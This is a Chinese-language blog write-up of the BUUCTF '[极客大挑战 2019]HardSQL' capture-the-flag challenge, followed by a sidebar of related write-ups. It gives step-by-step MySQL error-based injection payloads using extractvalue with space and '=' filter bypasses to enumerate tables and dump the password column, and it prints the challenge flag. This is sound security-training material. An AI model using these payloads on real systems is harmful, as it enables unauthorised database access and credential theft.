MySQL注入 [极客大挑战 2019]HardSQL

最新推荐文章于 2024-10-22 12:02:03 发布
最新推荐文章于 2024-10-22 12:02:03 发布
阅读量420 收藏 2
点赞数 1
分类专栏: 渗透测试学习 信息安全 Web安全 文章标签: mysql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121860157
版权

MySQL注入 [极客大挑战 2019]HardSQL

一、必备基础知识

#号被过滤了使用%23--+绕过
空格被过滤了使用括号/**/绕过

二、实战化渗透

[极客大挑战 2019]HardSQL
1.使用1'进行简单的测试,报错
在这里插入图片描述

2.使用#注释--+,发现均被过滤,使用#URL绕过

1'#

在这里插入图片描述

3.经过测试,过滤了and空格等号
使用括号绕过空格,使用like绕过等号,使用extractvalue报错注入
获取数据库

1'or(select(extractvalue(1,concat('~',(select(database()))))))%23

在这里插入图片描述

4.得到数据库名为geek,获取数据表

1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23

在这里插入图片描述
5.得到数据表名为H4rDsq1,获取字段名信息

1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))%23

在这里插入图片描述

6.得到三个字段,分别是id,username,password,我们要的是密码信息

1'or(extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)))))%23

在这里插入图片描述
7.得到一部分flag,因为flag比较长,回显出来的字段长度不足,使用rigth,left函数进行截断,得到完整的flag

1'or(extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)))))%23

在这里插入图片描述
到的flag为1-8965-f560969904c1}

在这里插入图片描述
8.得到另一段flag{99aefc25-50ec-4161-8965-f5

9.拼接之后,获取完整的flag

flag{99aefc25-50ec-4161-8965-f560969904c1}

在这里插入图片描述

山川绿水
关注
专栏目录
极客挑战2019Hardsql
uuzfumo的博客
11-06 410
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
CTF学习笔记——[极客挑战 2019]BuyFlag
Obs_cure的博客
02-16 3613
一、[极客挑战 2019]BuyFlag 1.题目 2.解题步骤 MENU界面下有buyflag的界面,按F12看看 查了一下is_numeric()这个函数,他的作用是判断输入是否是数字的。如果是纯数字返回true,如果不是返回false。这道题注释的代码逻辑是要输入一个非纯数字的字符串且等于404,密码才能正确。 然后顺手百度了一下这个函数的漏洞,在这里贴出来: 这个函数和mysql结合起来就容易出问题,那是因为is_numeric判断的时候,当碰到16进制数的时候,也会判断成数字 is_num
[极客挑战 2019]HardSQL
qq_51902218的博客
08-24 552
目录 1.简单测试 2.报错注入 3. 爆库 4. 爆表 5. 爆列 6. 爆值 7. 拼接 1.简单测试 回顾之前的SQL,都是一种样式,肯定是原来的升级版,那就简单测试一下,输入and 1 = 1,order by......不论是发现都是一样的界面 2.报错注入 尝试用报错注入的方式试一试呗,反正不吃亏 一开始按照常理输入句子爆库,不行,发现应该是过滤掉一些关键字,但是具体过滤掉哪一些,本人还不太会使用工具,所以手工尝试,发现过滤了and、= 空格...
极客挑战2019Hard SQL注入解题
Bird&Bird
10-26 1313
1、打开BUUCTF在线评测,选择web----->【极客挑战2019HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2090
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
sql注入过滤了#,--+怎么办
weixin_30673715的博客
11-26 1846
题目是NCTF2018的web题目 第一段是错误的思路,第二段是晚上有思考后发现的直接看第二段吧。 ① ?id=1'会直接出来报错提示。 猜测使用单引号保护id。 另外一打空格就提示you hacker,空格在尾部是不会提示的,猜测用了去除尾部的空格的函数trim()。 空格的过滤绕过 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ () 挨个试就行,最好不...
sql注入报错注入极客挑战 2019HardSQL解题
菜鸟-传奇
12-29 639
极客挑战 2019HardSQL解题 一.试万能密码 username=admin' or 1='1&password=1 二.尝试绕开 大写,双写。 看来是没办法使用基础手段绕开了。 这次没有过滤or,但是过滤了空格,=。 查了一下得知是考报错注入,使用extractvalue和updatexml。 三.爆库 username=admin'or(updatexml(1,con...
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 883
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1480
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
PHP+Mysql 带SQL注入源码 下载
01-01
这个"PHP+Mysql 带SQL注入源码 下载"的主题涉及到一个常见的安全问题——SQL注入,以及如何处理和预防这种情况。下面将详细讨论SQL注入、PHP与MySQL的结合使用,以及如何防范SQL注入。 **SQL注入** SQL注入是一种...
BUUCTF-[极客挑战 2019]HardSQL 1
xixihahawuwu的博客
01-23 1218
检查页面元素 用get的方式请求两个参数username和password 利用hackbar工具 用户名和密码随便构造 在密码处尝试注入 发现单引号会报错,而双引号则不会,应该是普通单引号闭合的字符型注入点 尝试注入,发现对sql语句有过滤,并且存在着URL转码 union及select等函数同样被过滤 利用报错注入 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(databa.
sql注入解析(四)避开过滤
ncafei的博客
03-14 1945
上一篇: http://www.2cto.com/Article/201209/153279.html web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被过滤的字符: 比如注入一个数字数据,就不需要使用单引号;’ or 1=1–,如果注释字符被过滤,我们可以这样写 ‘ or ’1′=’1 。 2、 避免使用简单确认:
SQL注入(过滤空格和--+等注释符)
weixin_30335353的博客
09-10 2833
1、地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤了空格和--+等注释符) 思路:确定注入参数值类型,直接输入单引号,根据报错信息确定参数值类型为字符型,如下图所示。 2、正常思路输入' or '1'='1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入' '1'='1, 仍然报错,信息为SQLi ...
【攻防世界】十四、supersqli
Hi~ 土拨鼠
09-08 162
步骤 先输入1'")提交之后发现报错: 根据报错信息我们可以发现是用单引号'来进行闭合的 接着使用1' --+发现被过滤: 然后使用注释1' #发现可以使用: 使用order by语句发现有两个字段,接下来再用联合查询1' and select 1,2 #发现被过滤了: 而且绕不过去,既然这样我们尝试一下报错注入: payload:1' and extractvalue(1,concat('^',database(),'^'))# 成功拿到库名,但是拿到之后也没有其他方法继续拿数据,这里我们...
Java Web基础知识之Filter:过滤一切你不想看到的事情
热门推荐
lmy86263的博客
04-26 3万+
不要相信客户端, 所以做后端的人都应该铭记的事情。因为前端传过来的数据并不总是合法和有效的,所以后端是对访问资源的最后一道保护伞。之前我们在Spring中说到过AOP编程,AOP基础知识,它就可以在执行我们的方法之前进行一些预处理和验证来保护后端的资源。不难想到她的实现方式和本篇要说的过滤器的实现原理应该是相同的,都是通过Java的动态代理实现的(自己的理解)。
CTF比赛中使用Python通过Mysql漏洞获取FLAG
单核CPU的小朋友的博客
03-21 1317
#!/usr/bin/env python import MySQLdb def Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor = db.cursor() try: query = "insert into py values(\"%s\",\"%s\");"%(ip,flag) cursor.execute(query
网络安全攻防实验室通关教程-注入
黑面狐
10-19 1万+
网络安全实验室传送门: 地址:http://hackinglab.cn  第一题:最简单的SQL注入 查看网页源码,获取到提示,要登录admin 所以构造用户名  admin' or 'a'='a'#   密码随便填, 获取到flag 第2题:最简单的sql注入(熟悉环境) 查看网页源码获得提示参数id=1  是数字型注入 于是构造url    index.
SQL注入实战第一个flag!
qq_41904330的博客
08-04 6222
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
MySQL的多列索引问题:最左匹配原则
最新发布
0
10-22 582
最左匹配原则是数据库索引设计中的一个重要概念,尤其是在使用MySQL数据库时。这个原则指出,在创建多列索引时,索引会从最左边的列开始匹配,直到遇到范围查询(如>、
[极客挑战 2019]PHP
09-07
极客挑战 2019 中,PHP 是一种常见的编程语言,它被广泛用于开发动态网页和Web应用程序。PHP 的全称是“PHP: Hypertext Preprocessor”,它可以嵌入到HTML中,并用于生成动态内容。 PHP 是一种开源语言,具有简单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值